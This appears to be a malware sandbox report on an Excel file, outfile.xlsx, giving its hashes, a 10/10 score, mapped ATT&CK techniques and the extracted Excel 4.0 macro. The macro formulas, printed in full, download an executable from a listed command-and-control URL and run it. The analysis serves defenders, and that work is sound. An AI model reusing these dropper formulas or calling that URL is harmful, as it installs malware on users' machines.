Overview

overview

10

Static

static

10

outfile.xls

windows7-x64

10

outfile.xls

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    outfile.xlsx

  • Size

    94KB

  • Sample

    230625-qc7xbseh9t

  • MD5

    9ec8d5bc205fded2bf9508f7194f88f4

  • SHA1

    7009deb529f2d4355727f73bf586f02415c2f492

  • SHA256

    eebfd0a510f5cf27e40b16f9e74f23f50a24b43a8d370eb6244ace00b53e69e2

  • SHA512

    37bf6ca2d80d6124f5dae24ce2b6c6944dfde623593111d31f964ce3fc452ff1cc7e4ceb9c294b78b28c4f7a4c994aa5ef9eed8db9863bf7268fd2c5fbfa778c

  • SSDEEP

    1536:YveZ+RwPONXoRjDhIcp0fDlaGGx+cL26nA0VSNcd52CibTXVNpity5pgKejDzGYK:Y2Z+RwPONXoRjDhIcp0fDlaGGx+cL26G

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj\IOKVYnJ",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",,0,0) =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Targets

    • Target

      outfile.xlsx

    • Size

      94KB

    • MD5

      9ec8d5bc205fded2bf9508f7194f88f4

    • SHA1

      7009deb529f2d4355727f73bf586f02415c2f492

    • SHA256

      eebfd0a510f5cf27e40b16f9e74f23f50a24b43a8d370eb6244ace00b53e69e2

    • SHA512

      37bf6ca2d80d6124f5dae24ce2b6c6944dfde623593111d31f964ce3fc452ff1cc7e4ceb9c294b78b28c4f7a4c994aa5ef9eed8db9863bf7268fd2c5fbfa778c

    • SSDEEP

      1536:YveZ+RwPONXoRjDhIcp0fDlaGGx+cL26nA0VSNcd52CibTXVNpity5pgKejDzGYK:Y2Z+RwPONXoRjDhIcp0fDlaGGx+cL26G

    Score
    10/10
    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks